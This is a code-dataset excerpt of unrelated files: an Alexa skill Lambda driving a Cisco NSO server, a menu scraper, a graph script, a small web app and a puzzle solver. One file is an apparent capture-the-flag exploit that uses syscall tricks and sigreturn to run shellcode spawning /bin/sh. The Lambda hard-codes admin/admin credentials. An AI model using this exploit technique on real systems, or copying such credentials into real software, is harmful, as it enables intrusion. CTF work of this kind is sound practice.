code.json()\n w=y['tailf-ncs:services']\n m=w['l2vpn1:l2vpn1']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n value = items\n slot_values = request.intent.slots[\"delete_service\"].value\n for ext in value:\n if ext in slot_values:\n requests.delete(\"http://203.122.19.100:6661/api/running/services/l2vpn1/{}\".format(slot_values) ,auth=(\"admin\",\"admin\"))\n return (\"Service has been deleted\")\n else :\n return (\"Service name is not found ............ please try again\")\n \ndef service_create(request):\n import requests\n import time\n import json\n import collections\n slot_device = request.intent.slots[\"device_name\"].value\n slot_de = slot_device.upper()\n slot_dev = request.intent.slots[\"device_no\"].value\n slot_d = slot_dev.upper()\n slot_value = request.intent.slots[\"Service_name\"].value\n slot_val = request.intent.slots['pw_id'].value\n slot_loopback = request.intent.slots[\"loopback_ip\"].value\n slot_interface = request.intent.slots['interface_number'].value\n slot_interfac = slot_interface.replace(' ', '/')\n slot_interf = request.intent.slots['interface_no'].value\n slot_inte = slot_interf.replace(' ','/')\n slot_remote = request.intent.slots['ip_address'].value\n \n payload = {\n \"l2vpn1:l2vpn1\": {\n \"name\": slot_value,\n \"pw-id\": slot_val,\n \"link\": [\n {\n \"device\": slot_de,\n \"ios\": {\n \"intf-number\": str(slot_interfac)\n },\n \"remote-ip\": str(slot_remote)\n },\n {\n \"device\": slot_d,\n \"iosxr\": {\n \"intf-number\": str(slot_inte)\n },\n \"remote-ip\": str(slot_loopback)\n }\n ]\n }\n }\n code = requests.post(\"http://203.122.19.100:6661/api/running/services/\",headers={\"Content-Type\": \"application/vnd.yang.data+json\"}, auth=(\"admin\",\"admin\"), data=json.dumps(payload))\n code = requests.post(\"http://203.122.19.100:6661/api/running/services/\",headers={\"Content-Type\": \"application/vnd.yang.data+json\"}, auth=(\"admin\",\"admin\"), json=payload)\n cod= requests.get(\"http://203.122.19.100:6661/api/running/services/l2vpn1/\",headers={\"Accept\": \"application/vnd.yang.collection+json\"},auth=(\"admin\",\"admin\"))\n y = cod.json()\n w=y['collection']\n m=w['l2vpn1:l2vpn1']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['pw-id'])\n if any(list == slot_val for list in items): \n return \"Pw-id has been already exist..... Please try again\"\n elif (code.status_code == 400):\n return \"Service is not created... Please try again\"\n else :\n return \"Service has been created\"\n \ndef device_info():\n import requests\n import time\n import json \n code= requests.get(\"http://203.122.19.100:6661/api/operational/devices\",headers={\"Accept\": \"application/vnd.yang.data+json\"},auth=(\"admin\",\"admin\"))\n y = code.json()\n w=y['tailf-ncs:devices']\n m=w['device']\n x=json.dumps(m)\n db=json.loads(x)\n items = []\n for item in db:\n items.append(item['name'])\n return \"Current running devices are\",items\n\ndef get_random_goodbye():\n \"\"\"Return random goodbye message.\"\"\"\n # type: () -> str\n goodbyes = [\"OK. Goodbye!\", \"Have a great day!\", \"Come back again soon!\"]\n return random.choice(goodbyes)\n\ndef get_speakable_list_of_products(entitled_products_list):\n \"\"\"Return product list in speakable form.\"\"\"\n # type: (List[InSkillProduct]) -> str\n product_names = [item.name for item in entitled_products_list]\n if len(product_names) > 1:\n # If more than one, add and 'and' in the end\n speech = \" and \".join(\n [\", \".join(product_names[:-1]), product_names[-1]])\n else:\n # If one or none, then return the list content in a string\n speech = \", \".join(product_names)\n return speech\n\ndef get_resolved_value(request, slot_name):\n \"\"\"Resolve the slot name from the request using resolutions.\"\"\"\n # type: (IntentRequest, str) -> Union[str, None]\n try:\n return (request.intent.slots[slot_name].resolutions.resolutions_per_authority[0].values[0].value.name)\n except (AttributeError, ValueError, KeyError, IndexError):\n return None\n\ndef get_spoken_value(request, slot_name):\n \"\"\"Resolve the slot to the spoken value.\"\"\"\n # type: (IntentRequest, str) -> Union[str, None]\n try:\n return request.intent.slots[slot_name].value\n except (AttributeError, ValueError, KeyError, IndexError):\n return None\n\ndef in_skill_product_response(handler_input):\n \"\"\"Get the In-skill product response from monetization service.\"\"\"\n # type: (HandlerInput) -> Union[InSkillProductsResponse, Error]\n locale = handler_input.request_envelope.request.locale\n ms = handler_input.service_client_factory.get_monetization_service()\n return ms.get_in_skill_products(locale)\n\n# Skill Handlers\n\nclass LaunchRequestHandler(AbstractRequestHandler):\n \"\"\"Handler for Launch Requests.\n\n The handler gets the in-skill products for the user, and provides\n a custom welcome message depending on the ownership of the products\n to the user.\n User says: Alexa, open .\n \"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_request_type(\"LaunchRequest\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In LaunchRequestHandler\")\n\n in_skill_response = in_skill_product_response(handler_input)\n if isinstance(in_skill_response, InSkillProductsResponse):\n entitled_prods = get_all_entitled_products(in_skill_response.in_skill_products)\n if entitled_prods:\n speech = (\n \"Welcome to {}. You currently own {} products. \"\n \"To hear a random fact, you could say, 'Tell me a fact', \"\n \"or you can ask for a specific category you have \"\n \"purchased, for example, say 'Tell me a science fact'. \"\n \"To know what else you can buy, say, 'What can i buy?'. \"\n \"So, what can I help you with?\").format(skill_name,get_speakable_list_of_products(entitled_prods))\n else:\n logger.info(\"No entitled products\")\n speech = (\n \"Hello.......Welcome to InfinityLabs.... A Technology \"\n \"consulting and Software Solutions Company. Providing\"\n \"expert IT services in the areas of Automation,\"\n \"Network Design and Deployment, IT Security,\"\n \"Data Centre Management, Cloud computing,\"\n \"Virtualization, machine learning and analytic,.....\"\n \"What would you want me to help you with today ?\"\n ).format(skill_name)\n reprompt = \"I didn't catch that. What can I help you with?\"\n else:\n logger.info(\"Error calling InSkillProducts API: {}\".format(in_skill_response.message))\n speech = \"Something went wrong in loading your purchase history.\"\n reprompt = speech\n\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n\n\nclass WelcomeIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"WelcomeIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"WelcomeIntentHandler\")\n fact_rest = welcome_script()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n \n \nclass YesHandler(AbstractRequestHandler):\n \"\"\"If the user says Yes, they want another fact.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"AMAZON.YesIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In YesHandler\")\n fact_text = get_random_from_list(all_facts)\n fact_rest = check_status()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_yes_no_question())).ask(get_random_yes_no_question()).response\n \n\nclass NoHandler(AbstractRequestHandler):\n \"\"\"If the user says No, then the skill should be exited.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"AMAZON.NoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In NoHandler\")\n return handler_input.response_builder.speak(get_random_goodbye()).set_should_end_session(True).response\n\n\nclass RouterinformationHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"RouterinformationIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In RouterinformationHandler\")\n fact_rest = package_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n \n\nclass ServicesinformationHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"ServicesinformationIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In ServicesinformationHandler\")\n fact_rest = service_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n\n\nclass CreateserviceHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"CreateserviceIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In CreateserviceHandler\")\n fact_rest = create_service()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configz())).ask(get_random_configz()).response\n\n\nclass DeviceinformationHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"DeviceinformationIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In DeviceinformationHandler\")\n fact_rest = device_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n\n \nclass CancelSubscriptionHandler(AbstractRequestHandler):\n \"\"\"\n Following handler demonstrates how Skills would receive Cancel requests\n from customers and then trigger a cancel request to Alexa\n User says: Alexa, ask premium facts to cancel \n \"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"CancelSubscriptionIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In CancelSubscriptionHandler\")\n\n in_skill_response = in_skill_product_response(handler_input)\n if in_skill_response:\n product_category = get_resolved_value(handler_input.request_envelope.request, \"productCategory\")\n\n # No entity resolution match\n if product_category is None:\n product_category = \"all_access\"\n else:\n product_category += \"_pack\"\n\n product = [l for l in in_skill_response.in_skill_products\n if l.reference_name == product_category]\n return handler_input.response_builder.add_directive(\n SendRequestDirective(\n name=\"Cancel\",\n payload={\n \"InSkillProduct\": {\n \"productId\": product[0].product_id\n }\n },\n token=\"correlationToken\")\n ).response\n\n\nclass BuyResponseHandler(AbstractRequestHandler):\n \"\"\"This handles the Connections.Response event after a buy occurs.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"Connections.Response\")(handler_input) and\n handler_input.request_envelope.request.name == \"Buy\")\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In BuyResponseHandler\")\n in_skill_response = in_skill_product_response(handler_input)\n product_id = handler_input.request_envelope.request.payload.get(\"productId\")\n\n if in_skill_response:\n product = [l for l in in_skill_response.in_skill_products\n if l.product_id == product_id]\n logger.info(\"Product = {}\".format(str(product)))\n if handler_input.request_envelope.request.status.code == \"200\":\n speech = None\n reprompt = None\n purchase_result = handler_input.request_envelope.request.payload.get(\n \"purchaseResult\")\n if purchase_result == PurchaseResult.ACCEPTED.value:\n category_facts = all_facts\n if product[0].reference_name != \"all_access\":\n category_facts = [l for l in all_facts if\n l.get(\"type\") ==\n product[0].reference_name.replace(\n \"_pack\", \"\")]\n speech = (\"You have unlocked the {}. Here is your {} \"\n \"fact: {} {}\").format(\n product[0].name,\n product[0].reference_name.replace(\n \"_pack\", \"\").replace(\"all_access\", \"\"),\n get_random_from_list(category_facts),\n get_random_yes_no_question())\n reprompt = get_random_yes_no_question()\n elif purchase_result in (\n PurchaseResult.DECLINED.value,\n PurchaseResult.ERROR.value,\n PurchaseResult.NOT_ENTITLED.value):\n speech = (\"Thanks for your interest in {}. \"\n \"Would you like another random fact?\".format(\n product[0].name))\n reprompt = \"Would you like another random fact?\"\n elif purchase_result == PurchaseResult.ALREADY_PURCHASED.value:\n logger.info(\"Already purchased product\")\n speech = \" Do you want to hear a fact?\"\n reprompt = \"What can I help you with?\"\n else:\n # Invalid purchase result value\n logger.info(\"Purchase result: {}\".format(purchase_result))\n return FallbackIntentHandler().handle(handler_input)\n\n return handler_input.response_builder.speak(speech).ask(\n reprompt).response\n else:\n logger.log(\"Connections.Response indicated failure. \"\n \"Error: {}\".format(\n handler_input.request_envelope.request.status.message))\n\n return handler_input.response_builder.speak(\n \"There was an error handling your purchase request. \"\n \"Please try again or contact us for help\").response\n\n\n########################################\n################SDDEV CLASS#############\n########################################\n\n\nclass SddevdeviceinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevdeviceinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevdeviceinfoIntentHandler\")\n fact_rest = sddevdevice_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n\n\n\n\nclass SddevsitesinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevsitesinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevsitesinfoIntentHandler\")\n fact_rest = sddevsites_info()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n \n \nclass SddevpidinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevpidinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevpidinfoIntentHandler\")\n fact_rest = sddevpid_count()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n \n \nclass SddevuserinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevuserinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevuserinfoIntentHandler\")\n fact_rest = sddevuser_count()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n\n\n\nclass SddevactivelicenseinfoHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"SddevactivelicenseinfoIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SddevactivelicenseinfoIntentHandler\")\n fact_rest = sddevactivelicense_count()\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest, get_random_configsz())).ask(get_random_configsz()).response\n\n\nclass CancelResponseHandler(AbstractRequestHandler):\n \"\"\"This handles the Connections.Response event after a cancel occurs.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"Connections.Response\")(handler_input) and\n handler_input.request_envelope.request.name == \"Cancel\")\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In CancelResponseHandler\")\n in_skill_response = in_skill_product_response(handler_input)\n product_id = handler_input.request_envelope.request.payload.get(\n \"productId\")\n\n if in_skill_response:\n product = [l for l in in_skill_response.in_skill_products\n if l.product_id == product_id]\n logger.info(\"Product = {}\".format(str(product)))\n if handler_input.request_envelope.request.status.code == \"200\":\n speech = None\n reprompt = None\n purchase_result = handler_input.request_envelope.request.payload.get(\n \"purchaseResult\")\n purchasable = product[0].purchasable\n if purchase_result == PurchaseResult.ACCEPTED.value:\n speech = (\"You have successfully cancelled your \"\n \"subscription. {}\".format(\n get_random_yes_no_question()))\n reprompt = get_random_yes_no_question()\n\n if purchase_result == PurchaseResult.DECLINED.value:\n if purchasable == PurchasableState.PURCHASABLE:\n speech = (\"You don't currently have a \"\n \"subscription. {}\".format(\n get_random_yes_no_question()))\n else:\n speech = get_random_yes_no_question()\n reprompt = get_random_yes_no_question()\n\n return handler_input.response_builder.speak(speech).ask(\n reprompt).response\n else:\n logger.log(\"Connections.Response indicated failure. \"\n \"Error: {}\".format(\n handler_input.request_envelope.request.status.message))\n\n return handler_input.response_builder.speak(\n \"There was an error handling your cancellation \"\n \"request. Please try again or contact us for \"\n \"help\").response\n \n \nclass UpsellResponseHandler(AbstractRequestHandler):\n \"\"\"This handles the Connections.Response event after an upsell occurs.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"Connections.Response\")(handler_input) and\n handler_input.request_envelope.request.name == \"Upsell\")\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In UpsellResponseHandler\")\n\n if handler_input.request_envelope.request.status.code == \"200\":\n if handler_input.request_envelope.request.payload.get(\n \"purchaseResult\") == PurchaseResult.DECLINED.value:\n speech = (\"Ok. Here's a random fact: {} {}\".format(\n get_random_from_list(all_facts),\n get_random_yes_no_question()))\n reprompt = get_random_yes_no_question()\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n else:\n logger.log(\"Connections.Response indicated failure. \"\n \"Error: {}\".format(\n handler_input.request_envelope.request.status.message))\n return handler_input.response_builder.speak(\n \"There was an error handling your Upsell request. \"\n \"Please try again or contact us for help.\").response\n\n\nclass HelpIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for help message to users.\"\"\"\n def can_handle(self, handler_input):\n return is_intent_name(\"AMAZON.HelpIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In HelpIntentHandler\")\n in_skill_response = in_skill_product_response(handler_input)\n\n if isinstance(in_skill_response, InSkillProductsResponse):\n speech = (\n \"To hear about NSO you can say \"\n \"'infinity', or to hear about How to create a NSO service using CLI, 'Please follow cisco documents' \"\n )\n reprompt = \"I didn't catch that. What can I help you with?\"\n else:\n logger.info(\"Error calling InSkillProducts API: {}\".format(\n in_skill_response.message))\n speech = \"Something went wrong in loading your purchase history.\"\n reprompt = speech\n return handler_input.response_builder.speak(speech).ask(reprompt).response\n\nclass ServiceNameIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"ServiceNameIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In ServiceNameIntentHandler\")\n fact_rest = service_create(handler_input.request_envelope.request)\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response\n \nclass DeleteserviceIntentHandler(AbstractRequestHandler):\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return is_intent_name(\"DeleteserviceIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In DeleteserviceIntentHandler\")\n fact_rest = delete_service(handler_input.request_envelope.request)\n return handler_input.response_builder.speak(\"{} {}\".format(fact_rest,get_random_configsz())).ask(get_random_configsz()).response \n \nclass FallbackIntentHandler(AbstractRequestHandler):\n \"\"\"Handler for fallback intent.\n\n 2018-July-12: AMAZON.FallbackIntent is currently available in all\n English locales. This handler will not be triggered except in that\n locale, so it can be safely deployed for any locale. More info\n on the fallback intent can be found here: https://developer.amazon.com/docs/custom-skills/standard-built-in-intents.html#fallback\n \"\"\"\n def can_handle(self, handler_input):\n return is_intent_name(\"AMAZON.FallbackIntent\")(handler_input)\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In FallbackIntentHandler\")\n speech = (\n \"Sorry. I cannot help with that.\"\n \"...........\"\n \"To hear about N S O you can say,. 'infinity' \"\n \"............Or say.....\"\n \"'Help me'...... \"\n )\n reprompt = \"I didn't catch that. What can I help you with?\"\n\n return handler_input.response_builder.speak(speech).ask(\n reprompt).response\n\n\nclass SessionEndedHandler(AbstractRequestHandler):\n \"\"\"Handler for session end request, stop or cancel intents.\"\"\"\n def can_handle(self, handler_input):\n # type: (HandlerInput) -> bool\n return (is_request_type(\"SessionEndedRequest\")(handler_input) or\n is_intent_name(\"AMAZON.StopIntent\")(handler_input) or\n is_intent_name(\"AMAZON.CancelIntent\")(handler_input))\n\n def handle(self, handler_input):\n # type: (HandlerInput) -> Response\n logger.info(\"In SessionEndedHandler\")\n return handler_input.response_builder.speak(\n get_random_goodbye()).set_should_end_session(True).response\n\n# Skill Exception Handler\nclass CatchAllExceptionHandler(AbstractExceptionHandler):\n \"\"\"One exception handler to catch all exceptions.\"\"\"\n def can_handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> bool\n return True\n\n def handle(self, handler_input, exception):\n # type: (HandlerInput, Exception) -> Response\n logger.error(exception, exc_info=True)\n\n speech = \"Sorry, I can't understand the command. Please try again!!\"\n handler_input.response_builder.speak(speech).ask(speech)\n\n return handler_input.response_builder.response\n\n# Request and Response Loggers\nclass RequestLogger(AbstractRequestInterceptor):\n \"\"\"Log the request envelope.\"\"\"\n def process(self, handler_input):\n # type: (HandlerInput) -> None\n logger.info(\"Request Envelope: {}\".format(\n handler_input.request_envelope))\n\nclass ResponseLogger(AbstractResponseInterceptor):\n \"\"\"Log the response envelope.\"\"\"\n def process(self, handler_input, response):\n # type: (HandlerInput, Response) -> None\n logger.info(\"Response: {}\".format(response))\n\n\nsb = StandardSkillBuilder()\n\nsb.add_request_handler(LaunchRequestHandler())\nsb.add_request_handler(YesHandler())\nsb.add_request_handler(NoHandler())\nsb.add_request_handler(RouterinformationHandler())\nsb.add_request_handler(BuyResponseHandler())\nsb.add_request_handler(CancelResponseHandler())\nsb.add_request_handler(UpsellResponseHandler())\nsb.add_request_handler(ServicesinformationHandler())\nsb.add_request_handler(CreateserviceHandler())\nsb.add_request_handler(DeviceinformationHandler())\nsb.add_request_handler(CancelSubscriptionHandler())\nsb.add_request_handler(HelpIntentHandler())\nsb.add_request_handler(FallbackIntentHandler())\nsb.add_request_handler(SessionEndedHandler())\nsb.add_request_handler(ServiceNameIntentHandler())\nsb.add_request_handler(DeleteserviceIntentHandler())\nsb.add_request_handler(WelcomeIntentHandler())\n\n\n\nsb.add_request_handler(SddevdeviceinfoHandler())\nsb.add_request_handler(SddevsitesinfoHandler())\nsb.add_request_handler(SddevpidinfoHandler())\nsb.add_request_handler(SddevuserinfoHandler())\nsb.add_request_handler(SddevactivelicenseinfoHandler())\n\n\n\nsb.add_exception_handler(CatchAllExceptionHandler())\nsb.add_global_request_interceptor(RequestLogger())\nsb.add_global_response_interceptor(ResponseLogger())\n\nlambda_handler = sb.lambda_handler()","sub_path":"SDDEV-LAMBDA CODE/sddevlambda.py","file_name":"sddevlambda.py","file_ext":"py","file_size_in_byte":39109,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"103747870","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nimport datetime\nfrom MenuChoices import MenuChoices\nfrom GetPage import getpage\nfrom push_poll import PushPoll\nfrom send_slack import SendSlack\n\n\n## Get main page of the VnB blog\nsoup_main = getpage(\"http://danielemarcaccini.com/\")\n\n\n## Get today's menu link from the main page\ntoday = datetime.date.today().strftime(\"%d-%m-%Y\")\n## Existing dates for testing :\n#today = \"20-04-2018\"\n#today = \"03-05-2018\"\nlinks = soup_main.find_all('a')\n\nmenu_url = \"\"\nfor link in links:\n if today in link.get('href'):\n menu_url = link.get('href')\n break\n\nif menu_url == \"\":\n print(\"No menu found today.\")\n exit()\n\n\n## Get today's menu page \nsoup_menu_today = getpage(menu_url)\n\n## Get today's menu\ncomplete_menu = [x.string for x in soup_menu_today.find(class_=\"entry-content\").find_all(\"p\")]\n\n## Display menu on stdout\n#print(complete_menu)\n\n\n## Sort the menu from the raw complete menu into a structured format :\n\n## The result is a list, in which each element is a custom class MenuChoices\n## MenuChoices has a Name (string) like \"plat\" or \"entrée\" / a Choice (list) containing today's options\n## /and optional side dishes (list)\n\n\nmenu_today = []\n\nfor line in complete_menu:\n if ':' in line:\n menu = MenuChoices()\n menu.setName(line.split(':', 1)[0])\n contenu = line.split(':', 1)[1]\n if \" e/o \" in contenu:\n menu.setChoice(contenu.split(' / ')[0].split(\" e/o \"))\n else:\n if ' / ' in contenu:\n menu.setChoice(contenu.split(' / ')[0].split(\" ou \"))\n else:\n menu.setChoice([contenu])\n if ' / ' in contenu:\n if \" e/o \" in contenu.split(' / ')[1]:\n menu.setSideDish(contenu.split(' / ')[1].split(\" e/o \"))\n else:\n menu.setSideDish(contenu.split(' / ')[1:])\n\n for choice in menu.getChoices():\n if menu.getSideDish():\n menu_today.append(f\"{menu.getName()} : {choice} + {menu.getSideDish()}\")\n else:\n menu_today.append(f\"{menu.getName()} : {choice}\")\n\n else:\n menu = MenuChoices()\n menu.setName(\"Autres\")\n menu.setChoice([line])\n menu_today.append(f\"{menu.getName()} : {menu.getChoices()}\")\n\n## Displays the menu's content for debug\n#print(\"Elements du Menu : #############\")\n#for i in menu_today:\n# print(i)\n\n## Create survey title\nsurvey_title = f\"\"\"Le menu du VnB du {datetime.date.today().strftime(\"%d-%m-%Y\")}\"\"\"\n\n## Send the VnB menu to push_poll to create the poll\nsurvey_url = PushPoll(menu_today, \"VnB\", survey_title)\n\n## Send the survey url to Slack to notify users\nSendSlack(f\"Voici le <{survey_url} | Nouveau Menu> du jour !\")\n\n","sub_path":"scrap_vnb.py","file_name":"scrap_vnb.py","file_ext":"py","file_size_in_byte":2746,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"176155966","text":"#add_is_root_property.py\n\nfrom Query import get_list_of_all_vertex_by_label as get_vertex\nfrom GremlinConnect import GremlinConnection\nfrom pprint import pprint\nimport json\n\ndef get_list(traversal, label):\n vertex_list = get_vertex(traversal, label)\n return vertex_list\n\ndef get_janus_graph_traversal(connection_driver):\n print(\"&&& Calling Gremlin Connect &&& \")\n gremlin_traversal= GremlinConnection.traversal_connection(connection_driver)\n print(\"&&& Gremlin is Lived &&& \")\n return gremlin_traversal\n\ndef get_janus_graph_connection_driver():\n host= '192.168.1.195'\n port = '8182'\n driver = GremlinConnection.connection_driver(host,port)\n print(\"&&& Gremlin is Alive &&& \")\n return driver\n\ndef add_is_root_property(traversal,list):\n for vertex in list:\n submission = traversal.V(vertex.id).property(\"is_root\", True).iterate()\n print(\"1 done\")\n print('done')\n\ndef main():\n connection_driver = get_janus_graph_connection_driver()\n traversal = get_janus_graph_traversal(connection_driver)\n list = get_list(traversal = traversal, label = 'city')\n add_is_root_property(traversal=traversal, list = list)\n connection_driver.close()\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"AddIsRootProperty.py","file_name":"AddIsRootProperty.py","file_ext":"py","file_size_in_byte":1237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"637815450","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\nfrom wsgiref.simple_server import make_server\n\ndef application(environ, start_response):\n start_response('200 OK', [('Content-Type', 'text/html')])\n return '

    Hello, world!

    '\n\nserver = make_server('0.0.0.0', 9090, application)\n\nserver.serve_forever()\n\n","sub_path":"webapp.py","file_name":"webapp.py","file_ext":"py","file_size_in_byte":309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"172721773","text":"from pwn import *\r\ncontext.update(os='linux', arch='amd64')\r\n\r\ndef __syscall__(p, num, arg):\r\n p.sendlineafter('choice:', '0')\r\n p.sendlineafter('number:', str(num))\r\n p.sendlineafter('argument:', str(arg))\r\n\r\ndef __update__(p, user):\r\n p.sendlineafter('choice:', '1')\r\n p.sendafter('username:', user)\r\n\r\ndef exploit(host, port=20004):\r\n if host:\r\n p = remote(host, port)\r\n else:\r\n p = process('./syscall_interface')\r\n gdb.attach(p)\r\n syscall = lambda n,arg: __syscall__(p, n, arg)\r\n update = lambda usr: __update__(p, usr)\r\n\r\n # sys_personality : make the heap which is allocated later executable\r\n syscall(135, 0x0400000)\r\n # sys_brk : leak the end address of the heap\r\n syscall(12, 0)\r\n p.recvuntil('RET(')\r\n heap = int(p.recvuntil(')', drop=True), 16) - 0x22000\r\n log.info('[heap] '+hex(heap))\r\n\r\n # update username: place partial frame on the stack for rt_sigreturn\r\n sc = asm('''\r\n push 0x3b\r\n pop rax\r\n mov rbx, 0xFF978CD091969DD1\r\n neg rbx\r\n push rbx\r\n push rsp\r\n pop rdi\r\n cdq\r\n push rdx\r\n pop rsi\r\n syscall\r\n ''')\r\n partial_frame = [ # starts from rbp\r\n sc.rjust(0x28, '\\x90'),\r\n heap+0x800, # rsp\r\n heap+0x50, # rip\r\n 0, # eflags\r\n p16(0x33), # cs\r\n p32(0), # gs, fs\r\n p16(0x2b), # ss\r\n ]\r\n update(flat(partial_frame))\r\n\r\n # sys_restart_syscall : put shellcode on the heap when using printf(\"... by @%s\", ... , username)\r\n syscall(219, 0)\r\n # sys_rt_sigreturn : hijack rip points to shellcode on the heap\r\n syscall(15, 0)\r\n\r\n p.interactive()\r\n\r\nif __name__ == '__main__':\r\n exploit(args['REMOTE'])","sub_path":"2019/2019-rctf/syscall_interface/off_exp.py","file_name":"off_exp.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"19"} +{"seq_id":"651164402","text":"#!/usr/bin/python3\n\nimport networkx as nx\n#from copy import deepcopy\nimport sys\n#import random\nimport multiprocessing as mp\n\nprint (mp.cpu_count(),\"processors\")\n#themin = sys.maxsize\ntries=0\n#cache = dict()\n\n#import matplotlib.pyplot as plt\n\n#23100 too high\n#18386 too high\n\ndebug=False\n\nplanA = [\n \"#############\",\n \"#...........#\",\n \"###C#C#A#B###\",\n \"###D#D#B#A###\",\n \"#############\"]\n\n\nplan12521 = [\n \"#############\",\n \"#...........#\",\n \"###B#C#B#D###\",\n \"###A#D#C#A###\",\n \"#############\"]\n\nplan44169 = [\n \"#############\",\n \"#...........#\",\n \"###B#C#B#D###\",\n \"###D#C#B#A###\",\n \"###D#B#A#C###\", \n \"###A#D#C#A###\",\n \"#############\"]\n\nplant = [\n \"#############\",\n \"#CC.......DD#\",\n \"###.#.#A#B###\",\n \"###.#.#B#A###\",\n 